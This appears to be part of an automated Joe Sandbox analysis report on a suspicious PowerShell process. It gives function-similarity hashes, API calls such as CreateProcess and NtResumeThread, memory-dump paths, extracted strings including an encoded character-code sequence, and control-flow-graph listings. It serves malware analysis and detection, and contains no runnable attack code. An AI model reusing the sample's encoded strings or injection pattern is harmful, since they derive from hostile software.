                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 3bf36fedd545f743ccfa390156636ad5ea6c00faa289f8d93dccaa28264883bb
                                                                                                • Instruction ID: 8446f15bcd3d56f8d8ae817fd3b0ff33b88100be0a09919601b5159405072270
                                                                                                • Opcode Fuzzy Hash: 3bf36fedd545f743ccfa390156636ad5ea6c00faa289f8d93dccaa28264883bb
                                                                                                • Instruction Fuzzy Hash: A8A14A70D012498FDB90DFA9C985BEEBBF1FF48314F24852AE859A7680D7749881CF81
                                                                                                APIs
                                                                                                • NtResumeThread.NTDLL(?,?), ref: 0694A25E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6940000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: f84b8e2cb5777cd643f949d4e8dd8ad6fcf51f10557a6a2332e04c2261445108
                                                                                                • Instruction ID: 36ed9a0aae2f58926e93bc53b8f89e78d50544c822b9eefacd57d9d0ad0ce6b2
                                                                                                • Opcode Fuzzy Hash: f84b8e2cb5777cd643f949d4e8dd8ad6fcf51f10557a6a2332e04c2261445108
                                                                                                • Instruction Fuzzy Hash: 0C1108B1D103498EDB14DFAAC844ADFFBF4EF88320F14842AD419A7240CB75A945CFA5
                                                                                                APIs
                                                                                                • NtResumeThread.NTDLL(?,?), ref: 0694A25E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6940000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: 86561fa08f019a92847bb9ad4d65d9f3748f7922b0ea758f668935433c804150
                                                                                                • Instruction ID: 800e1e7708bd36c5007b458a8edbe8b258dcd9abc844d39b51cbb271afc2abfc
                                                                                                • Opcode Fuzzy Hash: 86561fa08f019a92847bb9ad4d65d9f3748f7922b0ea758f668935433c804150
                                                                                                • Instruction Fuzzy Hash: D811E7B1D043498FDB14DFAAC485A9EFBF4EF88324F14842AD419A7240CB75A945CFA5
                                                                                                APIs
                                                                                                • NtResumeThread.NTDLL(?,?), ref: 0694A25E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6940000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: a60c48ee7249a1347c4cec47b042b2dc2eefc85a6eb44b62f8a08ee49898bd64
                                                                                                • Instruction ID: 961e915e9d17c1779623cf38e89fa1be6d8e13ce67662a96555d4450bb6c8598
                                                                                                • Opcode Fuzzy Hash: a60c48ee7249a1347c4cec47b042b2dc2eefc85a6eb44b62f8a08ee49898bd64
                                                                                                • Instruction Fuzzy Hash: 0101F2719043098FDB10EB6AC804BEEFBF8AF91324F24845AD045E7250CA395946CB61
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6940000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: PH^q
                                                                                                • API String ID: 0-2549759414
                                                                                                • Opcode ID: c88849a89749ac4f19b49ab90510e7bdb4a5b98fde15f426b50e79c3cab9d92c
                                                                                                • Instruction ID: 3bb3385130d3f798968d33c8625b0a19a41e4031bd03a36c5e83a2d13fab0a84
                                                                                                • Opcode Fuzzy Hash: c88849a89749ac4f19b49ab90510e7bdb4a5b98fde15f426b50e79c3cab9d92c
                                                                                                • Instruction Fuzzy Hash: C7D11370E05208CFEBA4DF69D444BADBBF2BB49304F2090A9D409A7B55DB706D85CF41
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Te^q
                                                                                                • API String ID: 0-671973202
                                                                                                • Opcode ID: 379549e9b5ca3c194db6a0c399a65b316191bef82fa300f5c53e4118b77002f4
                                                                                                • Instruction ID: e56815c55c48f6319f8221228b58aaa7c3a181b54d102ed7dae60afe63801b02
                                                                                                • Opcode Fuzzy Hash: 379549e9b5ca3c194db6a0c399a65b316191bef82fa300f5c53e4118b77002f4
                                                                                                • Instruction Fuzzy Hash: 0EB10774E15218CFDB94DFA9D884BADBBF2BF49314F20916AE409EB251DB306985CF40
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Te^q
                                                                                                • API String ID: 0-671973202
                                                                                                • Opcode ID: a0a90416782a44632a2e2f80259ba8c2a8cd57ca9f895e40c8f067ba3046450c
                                                                                                • Instruction ID: 2ae12693d05f9abcfd266fa70035e2ade1d989692426660a96bf5ceb7a0cee30
                                                                                                • Opcode Fuzzy Hash: a0a90416782a44632a2e2f80259ba8c2a8cd57ca9f895e40c8f067ba3046450c
                                                                                                • Instruction Fuzzy Hash: 13B1C574E11218CFDB94DFA9D884BADBBF2BF49314F20916AE409EB251DB706985CF40
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Te^q
                                                                                                • API String ID: 0-671973202
                                                                                                • Opcode ID: d5b2f00e0fd4c2964055b17d5abb0663419286ce783c6236fa4fbb6b7fc8c815
                                                                                                • Instruction ID: 00328f445b33b28947dcfa1b669da62afe991159e7aef901c17f76a89b4d7152
                                                                                                • Opcode Fuzzy Hash: d5b2f00e0fd4c2964055b17d5abb0663419286ce783c6236fa4fbb6b7fc8c815
                                                                                                • Instruction Fuzzy Hash: E5A1E574E11218CFDB94CFA9D484B9DBBF2FB49314F2091AAE409EB251DB70A985CF40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540758559.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6700000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f221f0dc689fca26be335e0c7f21294558974529d15b0f12cd4a31cd28b1aeb0
                                                                                                • Instruction ID: c1d014686877b3ba4d21c948c3dcf195eb49ae69a5b86650b0c336d699a61aaa
                                                                                                • Opcode Fuzzy Hash: f221f0dc689fca26be335e0c7f21294558974529d15b0f12cd4a31cd28b1aeb0
                                                                                                • Instruction Fuzzy Hash: CA52A2B4A00628CFDBA0DF28D988B9AB7F6BF48301F1491D5990DA7355DB34AE81CF51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 122,65,75,78,106,100,121,78,110,66,122,71,51,52,86,66,84,100,114,67,106,119,78,89,120,48,89,73,71,81,54,67,119,119,120,74,119,115,$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$_$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-3262490275
                                                                                                • Opcode ID: d1b60fdadc40a91750c09934dc0a29782b87ff3c45f156e572430b6c810e14f6
                                                                                                • Instruction ID: c90e18523ab84c3a60f27d5e69c036317621eb06f2d7e4ecb9cf73fe4271b861
                                                                                                • Opcode Fuzzy Hash: d1b60fdadc40a91750c09934dc0a29782b87ff3c45f156e572430b6c810e14f6
                                                                                                • Instruction Fuzzy Hash: 58B2BF31F00209DFDBA4EF69C844A6ABFF2AF85311F24C46AD9099B355DB31D846CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-2087719723
                                                                                                • Opcode ID: 39adfbd0769287fa8ce489fe2bb924a1de35c9442d3756750d6e3ab50224bda0
                                                                                                • Instruction ID: b980e4e2acaf6cbd84cee295dd4072e530621d8898d4476de72d3f8e83c3322b
                                                                                                • Opcode Fuzzy Hash: 39adfbd0769287fa8ce489fe2bb924a1de35c9442d3756750d6e3ab50224bda0
                                                                                                • Instruction Fuzzy Hash: 8E324231F04209DFEF658F68C8447AABFE2AF95315F14846AE905DF281DB32D845C7A1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 666 6fe83c0-6fe83e9 667 6fe83ef-6fe83f4 666->667 668 6fe8de7-6fe8def 666->668 669 6fe840c-6fe8416 667->669 670 6fe83f6-6fe83fc 667->670 669->668 671 6fe841c-6fe8421 669->671 673 6fe83fe 670->673 674 6fe8400-6fe840a 670->674 675 6fe8439-6fe8443 671->675 676 6fe8423-6fe8429 671->676 673->669 674->669 675->668 679 6fe8449-6fe844e 675->679 677 6fe842d-6fe8437 676->677 678 6fe842b 676->678 677->675 678->675 681 6fe8466 679->681 682 6fe8450-6fe8456 679->682 686 6fe8469-6fe8473 681->686 684 6fe845a-6fe8464 682->684 685 6fe8458 682->685 684->681 685->681 686->668 687 6fe8479-6fe847e 686->687 688 6fe8496-6fe84b5 687->688 689 6fe8480-6fe8486 687->689 693 6fe84b7-6fe84e1 688->693 694 6fe84e4-6fe84ee 688->694 691 6fe848a-6fe8494 689->691 692 6fe8488 689->692 691->688 692->688 693->694 694->668 695 6fe84f4-6fe84f9 694->695 698 6fe84fb-6fe8501 695->698 699 6fe8511-6fe8539 695->699 700 6fe8505-6fe850f 698->700 701 6fe8503 698->701 699->668 705 6fe853f-6fe8546 699->705 700->699 701->699 706 6fe855e-6fe85aa 705->706 707 6fe8548-6fe854e 705->707 715 6fe8dcb-6fe8dd7 706->715 716 6fe85b0-6fe85d0 706->716 708 6fe8552-6fe855c 707->708 709 6fe8550 707->709 708->706 709->706 719 6fe85d3-6fe85df 716->719 720 6fe85e8-6fe8603 719->720 721 6fe85e1 719->721 724 6fe862c-6fe8636 720->724 725 6fe8605-6fe8624 720->725 721->720 722 6fe87ce-6fe87e9 721->722 723 6fe890b-6fe8926 721->723 730 6fe87eb-6fe880a 722->730 731 6fe8812-6fe883b 722->731 726 6fe894f-6fe8959 723->726 727 6fe8928-6fe8947 723->727 728 6fe863c-6fe8641 724->728 729 6fe8bb9-6fe8bf3 724->729 725->724 726->729 734 6fe895f-6fe8964 726->734 727->726 732 6fe8659-6fe8668 728->732 733 6fe8643-6fe8649 728->733 729->719 730->731 731->729 745 6fe8841-6fe8846 731->745 732->729 743 6fe866e-6fe8679 732->743 739 6fe864d-6fe8657 733->739 740 6fe864b 733->740 741 6fe897c-6fe898b 734->741 742 6fe8966-6fe896c 734->742 739->732 740->732 741->729 750 6fe8991-6fe899c 741->750 746 6fe896e 742->746 747 6fe8970-6fe897a 742->747 748 6fe867b-6fe8681 743->748 749 6fe8691-6fe86a0 743->749 753 6fe885e-6fe8867 745->753 754 6fe8848-6fe884e 745->754 746->741 747->741 756 6fe8685-6fe868f 748->756 757 6fe8683 748->757 749->729 751 6fe86a6-6fe86ad 749->751 758 6fe899e-6fe89a4 750->758 759 6fe89b4-6fe89df 750->759 762 6fe86af-6fe86b5 751->762 763 6fe86c5-6fe871f 751->763 753->729 766 6fe886d-6fe8874 753->766 764 6fe8852-6fe885c 754->764 765 6fe8850 754->765 756->749 757->749 760 6fe89a8-6fe89b2 758->760 761 6fe89a6 758->761 759->729 776 6fe89e5-6fe89ec 759->776 760->759 761->759 768 6fe86b9-6fe86c3 762->768 769 6fe86b7 762->769 763->729 797 6fe8725-6fe87c7 763->797 764->753 765->753 772 6fe888c-6fe88cf 766->772 773 6fe8876-6fe887c 766->773 768->763 769->763 801 6fe88e5-6fe88e8 772->801 802 6fe88d1-6fe88e3 772->802 779 6fe887e 773->779 780 6fe8880-6fe888a 773->780 783 6fe89ee-6fe89f4 776->783 784 6fe8a04-6fe8a59 776->784 779->772 780->772 787 6fe89f8-6fe8a02 783->787 788 6fe89f6 783->788 806 6fe8a5f-6fe8a73 784->806 807 6fe8bf8-6fe8cca 784->807 787->784 788->784 797->722 805 6fe88eb-6fe8904 801->805 802->805 805->723 811 6fe8a9c-6fe8aa6 806->811 812 6fe8a75-6fe8a94 806->812 816 6fe8ccc-6fe8ceb 807->816 817 6fe8cf3-6fe8d1c 807->817 814 6fe8aac-6fe8ab1 811->814 815 6fe8b7d-6fe8bb7 811->815 812->811 820 6fe8ac9-6fe8ad8 814->820 821 6fe8ab3-6fe8ab9 814->821 815->807 816->817 817->668 830 6fe8d22-6fe8d27 817->830 820->815 823 6fe8ade-6fe8ae5 820->823 826 6fe8abd-6fe8ac7 821->826 827 6fe8abb 821->827 828 6fe8afd-6fe8b7b 823->828 829 6fe8ae7-6fe8aed 823->829 826->820 827->820 828->807 833 6fe8aef 829->833 834 6fe8af1-6fe8afb 829->834 835 6fe8d3f-6fe8d48 830->835 836 6fe8d29-6fe8d2f 830->836 833->828 834->828 835->668 842 6fe8d4e-6fe8d55 835->842 838 6fe8d33-6fe8d3d 836->838 839 6fe8d31 836->839 838->835 839->835 845 6fe8d6d-6fe8db0 842->845 846 6fe8d57-6fe8d5d 842->846 863 6fe8dc6 845->863 864 6fe8db2-6fe8dc1 845->864 850 6fe8d5f 846->850 851 6fe8d61-6fe8d6b 846->851 850->845 851->845 863->686 864->686
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-2733347440
                                                                                                • Opcode ID: e7ebbebb49af7e2a767346000ce71f1d08d3a7f17beb8276aea5fb2be1bf48ce
                                                                                                • Instruction ID: ac42f0950f1c90138b0b20fc00c900725adbbfb40c5c368955841389ed76736d
                                                                                                • Opcode Fuzzy Hash: e7ebbebb49af7e2a767346000ce71f1d08d3a7f17beb8276aea5fb2be1bf48ce
                                                                                                • Instruction Fuzzy Hash: E0524874F003049FEB54DB98C844A6ABBB2BF89354F64C069D919AF355CB32EC46CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-928407100
                                                                                                • Opcode ID: 4f5d95da304288a5114b557295c1a26b73514f199504f32c50b4407209cf7426
                                                                                                • Instruction ID: 69249244dc1d1d17f329545fcdfd354aef323ffe60c5580264ed27d5a1d9b6d6
                                                                                                • Opcode Fuzzy Hash: 4f5d95da304288a5114b557295c1a26b73514f199504f32c50b4407209cf7426
                                                                                                • Instruction Fuzzy Hash: ED723731F043548FDB65CB6A885566BBFE6AFC6311F28C4ABD446CB282DB31C845C7A1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$XtS$XtS$h|S$h|S$tP^q$tP^q
                                                                                                • API String ID: 0-4271814089
                                                                                                • Opcode ID: 5ec40da746c4d13f7ff86142e80ad48dbc7c3bcc6c8b3a140c2f88a46d5e1951
                                                                                                • Instruction ID: 0f37af2ad27d8014bbb217ae3152c0803043b3445d4001730b63028fe73063d6
                                                                                                • Opcode Fuzzy Hash: 5ec40da746c4d13f7ff86142e80ad48dbc7c3bcc6c8b3a140c2f88a46d5e1951
                                                                                                • Instruction Fuzzy Hash: C2A2F6B0F042089FDB558F68C844A6EBBE2AF86315F18C4AAD905DF291DB31DC45CBA1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1563 6fe2830-6fe2856 1564 6fe29bf-6fe29ef 1563->1564 1565 6fe285c-6fe2861 1563->1565 1575 6fe2a19-6fe2a35 1564->1575 1576 6fe29f1-6fe29f6 1564->1576 1566 6fe2879-6fe287d 1565->1566 1567 6fe2863-6fe2869 1565->1567 1568 6fe296e-6fe2978 1566->1568 1569 6fe2883-6fe2885 1566->1569 1571 6fe286d-6fe2877 1567->1571 1572 6fe286b 1567->1572 1577 6fe297a-6fe2983 1568->1577 1578 6fe2986-6fe298c 1568->1578 1573 6fe2887-6fe2893 1569->1573 1574 6fe2895 1569->1574 1571->1566 1572->1566 1579 6fe2897-6fe2899 1573->1579 1574->1579 1590 6fe2a37-6fe2a6f 1575->1590 1591 6fe2a84-6fe2a85 1575->1591 1580 6fe2a0e-6fe2a10 1576->1580 1581 6fe29f8-6fe29fe 1576->1581 1582 6fe298e-6fe2990 1578->1582 1583 6fe2992-6fe299e 1578->1583 1579->1568 1586 6fe289f-6fe28a1 1579->1586 1595 6fe2a17-6fe2a18 1580->1595 1587 6fe2a02-6fe2a0c 1581->1587 1588 6fe2a00 1581->1588 1589 6fe29a0-6fe29bc 1582->1589 1583->1589 1592 6fe28a3-6fe28af 1586->1592 1593 6fe28b1 1586->1593 1587->1580 1588->1580 1597 6fe2a87-6fe2ada 1590->1597 1598 6fe2a71-6fe2a77 1590->1598 1591->1597 1599 6fe28b3-6fe28b5 1592->1599 1593->1599 1615 6fe2adc-6fe2afb 1597->1615 1616 6fe2b03-6fe2b0a 1597->1616 1602 6fe2a7b 1598->1602 1603 6fe2a79 1598->1603 1599->1568 1601 6fe28bb-6fe28bd 1599->1601 1605 6fe28bf-6fe28c5 1601->1605 1606 6fe28d7-6fe296b 1601->1606 1602->1591 1603->1597 1608 6fe28c9-6fe28d5 1605->1608 1609 6fe28c7 1605->1609 1608->1606 1609->1606 1615->1616 1618 6fe2c9b-6fe2cc8 1616->1618 1619 6fe2b10-6fe2b15 1616->1619 1648 6fe2ccd-6fe2ce1 1618->1648 1621 6fe2b2d-6fe2b3c 1619->1621 1622 6fe2b17-6fe2b1d 1619->1622 1621->1618 1627 6fe2b42-6fe2b47 1621->1627 1625 6fe2b1f 1622->1625 1626 6fe2b21-6fe2b2b 1622->1626 1625->1621 1626->1621 1629 6fe2b5f-6fe2b69 1627->1629 1630 6fe2b49-6fe2b4f 1627->1630 1629->1618 1635 6fe2b6f-6fe2b77 1629->1635 1633 6fe2b53-6fe2b5d 1630->1633 1634 6fe2b51 1630->1634 1633->1629 1634->1629 1636 6fe2b8f-6fe2b9e 1635->1636 1637 6fe2b79-6fe2b7f 1635->1637 1636->1618 1640 6fe2ba4-6fe2bbf 1636->1640 1638 6fe2b83-6fe2b8d 1637->1638 1639 6fe2b81 1637->1639 1638->1636 1639->1636 1646 6fe2bd9-6fe2bfb 1640->1646 1647 6fe2bc1-6fe2bc7 1640->1647 1646->1618 1659 6fe2c01-6fe2c06 1646->1659 1649 6fe2bcb-6fe2bd7 1647->1649 1650 6fe2bc9 1647->1650 1651 6fe2d0a-6fe2d42 1648->1651 1652 6fe2ce3-6fe2d02 1648->1652 1649->1646 1650->1646 1666 6fe2d43 1651->1666 1652->1651 1661 6fe2c1e-6fe2c39 1659->1661 1662 6fe2c08-6fe2c0e 1659->1662 1667 6fe2c3b-6fe2c41 1661->1667 1668 6fe2c53-6fe2c99 1661->1668 1663 6fe2c12-6fe2c1c 1662->1663 1664 6fe2c10 1662->1664 1663->1661 1664->1661 1666->1666 1670 6fe2c45-6fe2c51 1667->1670 1671 6fe2c43 1667->1671 1668->1648 1670->1668 1671->1668
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$Piy$Piy$$^q$$^q$$^q
                                                                                                • API String ID: 0-4097072622
                                                                                                • Opcode ID: d7b14de8d72fe909cf97564408afa141c77ffcf84fab7f84000b1026ba07e884
                                                                                                • Instruction ID: df63385bd6e78a025eb6c36d1db6ff2b1eb3206c199340d913dfed200a62bff3
                                                                                                • Opcode Fuzzy Hash: d7b14de8d72fe909cf97564408afa141c77ffcf84fab7f84000b1026ba07e884
                                                                                                • Instruction Fuzzy Hash: CCE1C131F002048FDB54CB68C495AAABFF6AF89311F15C4AAD805AF356DB31DE85CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$4hS$4hS$tP^q$tP^q
                                                                                                • API String ID: 0-164820830
                                                                                                • Opcode ID: 59f345edf71e5c3084ac694fef722d31cf63d4929806b5c0e926d4388239be2b
                                                                                                • Instruction ID: c1425cf3ee443fda5d0b8999039c854847a7290cf2f4d774e1e8f5346e1c7e51
                                                                                                • Opcode Fuzzy Hash: 59f345edf71e5c3084ac694fef722d31cf63d4929806b5c0e926d4388239be2b
                                                                                                • Instruction Fuzzy Hash: 6F22E131F002149FDB54CF68E85466ABFE2BF89311F14C46AE9099F291DB31ED45CBA1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1863 6fe2238-6fe225d 1864 6fe245b-6fe2490 1863->1864 1865 6fe2263-6fe2268 1863->1865 1877 6fe2492-6fe249e 1864->1877 1878 6fe24a0 1864->1878 1866 6fe226a-6fe2270 1865->1866 1867 6fe2280-6fe2284 1865->1867 1870 6fe2274-6fe227e 1866->1870 1871 6fe2272 1866->1871 1868 6fe228a-6fe228c 1867->1868 1869 6fe240b-6fe2415 1867->1869 1873 6fe228e-6fe229a 1868->1873 1874 6fe229c 1868->1874 1875 6fe2417-6fe2420 1869->1875 1876 6fe2423-6fe2429 1869->1876 1870->1867 1871->1867 1880 6fe229e-6fe22a0 1873->1880 1874->1880 1881 6fe242f-6fe243b 1876->1881 1882 6fe242b-6fe242d 1876->1882 1879 6fe24a2-6fe24a4 1877->1879 1878->1879 1884 6fe251f-6fe2529 1879->1884 1885 6fe24a6-6fe24b1 1879->1885 1880->1869 1886 6fe22a6-6fe22c5 1880->1886 1887 6fe243d-6fe2458 1881->1887 1882->1887 1891 6fe252b-6fe2532 1884->1891 1892 6fe2535-6fe253b 1884->1892 1888 6fe24cf 1885->1888 1889 6fe24b3-6fe24b9 1885->1889 1908 6fe22c7-6fe22d3 1886->1908 1909 6fe22d5 1886->1909 1897 6fe24d1-6fe24dd 1888->1897 1893 6fe24bf-6fe24cb 1889->1893 1894 6fe24bb-6fe24bd 1889->1894 1898 6fe253d-6fe253f 1892->1898 1899 6fe2541-6fe254d 1892->1899 1900 6fe24cd 1893->1900 1894->1900 1897->1884 1910 6fe24df-6fe24e6 1897->1910 1901 6fe254f-6fe256b 1898->1901 1899->1901 1900->1897 1911 6fe22d7-6fe22d9 1908->1911 1909->1911 1912 6fe256e-6fe257c 1910->1912 1913 6fe24ec-6fe24f1 1910->1913 1911->1869 1915 6fe22df-6fe22e6 1911->1915 1922 6fe257e-6fe25a1 1912->1922 1923 6fe25a3-6fe25b9 1912->1923 1916 6fe2509-6fe2512 1913->1916 1917 6fe24f3-6fe24f9 1913->1917 1915->1864 1921 6fe22ec-6fe22f1 1915->1921 1924 6fe2517-6fe251c 1916->1924 1918 6fe24fd-6fe2507 1917->1918 1919 6fe24fb 1917->1919 1918->1916 1919->1916 1925 6fe2309-6fe2317 1921->1925 1926 6fe22f3-6fe22f9 1921->1926 1922->1923 1934 6fe25bf-6fe25c4 1923->1934 1935 6fe2748-6fe279e 1923->1935 1925->1869 1933 6fe231d-6fe233a 1925->1933 1928 6fe22fd-6fe2307 1926->1928 1929 6fe22fb 1926->1929 1928->1925 1929->1925 1933->1869 1956 6fe2340-6fe2365 1933->1956 1936 6fe25dc-6fe25e0 1934->1936 1937 6fe25c6-6fe25cc 1934->1937 1938 6fe26f8-6fe2702 1936->1938 1939 6fe25e6-6fe25e8 1936->1939 1941 6fe25ce 1937->1941 1942 6fe25d0-6fe25da 1937->1942 1945 6fe2704-6fe270d 1938->1945 1946 6fe2710-6fe2716 1938->1946 1947 6fe25ea-6fe25f6 1939->1947 1948 6fe25f8 1939->1948 1941->1936 1942->1936 1950 6fe271c-6fe2728 1946->1950 1951 6fe2718-6fe271a 1946->1951 1949 6fe25fa-6fe25fc 1947->1949 1948->1949 1949->1938 1954 6fe2602-6fe2621 1949->1954 1955 6fe272a-6fe2745 1950->1955 1951->1955 1967 6fe2623-6fe263e 1954->1967 1968 6fe2640 1954->1968 1956->1869 1966 6fe236b-6fe23a2 1956->1966 1985 6fe23bc-6fe2408 1966->1985 1986 6fe23a4-6fe23aa 1966->1986 1969 6fe2642-6fe2644 1967->1969 1968->1969 1969->1938 1970 6fe264a-6fe2654 1969->1970 1973 6fe2656-6fe2671 1970->1973 1974 6fe26b2-6fe26e5 1970->1974 1979 6fe268b-6fe2696 1973->1979 1980 6fe2673-6fe2679 1973->1980 1995 6fe26ec-6fe26f5 1974->1995 1992 6fe26ae-6fe26b0 1979->1992 1993 6fe2698-6fe269e 1979->1993 1982 6fe267d-6fe2689 1980->1982 1983 6fe267b 1980->1983 1982->1979 1983->1979 1987 6fe23ae-6fe23ba 1986->1987 1988 6fe23ac 1986->1988 1987->1985 1988->1985 1992->1995 1997 6fe26a2-6fe26a4 1993->1997 1998 6fe26a0 1993->1998 1997->1992 1998->1992
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$|P$$^q$$^q$$^q
                                                                                                • API String ID: 0-3908943310
                                                                                                • Opcode ID: c2810d847fb95e7ef5c9191637e16c0d089fae1d4f5283babf922cedbab325ea
                                                                                                • Instruction ID: 9e7772968f345739b2c1debd05e637753d2c3305697faa673586dff626efedab
                                                                                                • Opcode Fuzzy Hash: c2810d847fb95e7ef5c9191637e16c0d089fae1d4f5283babf922cedbab325ea
                                                                                                • Instruction Fuzzy Hash: B1E15731F043148FDB548B68885166ABFEAAFD5311B14C4ABD906DF286EF31CE45C7A2

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
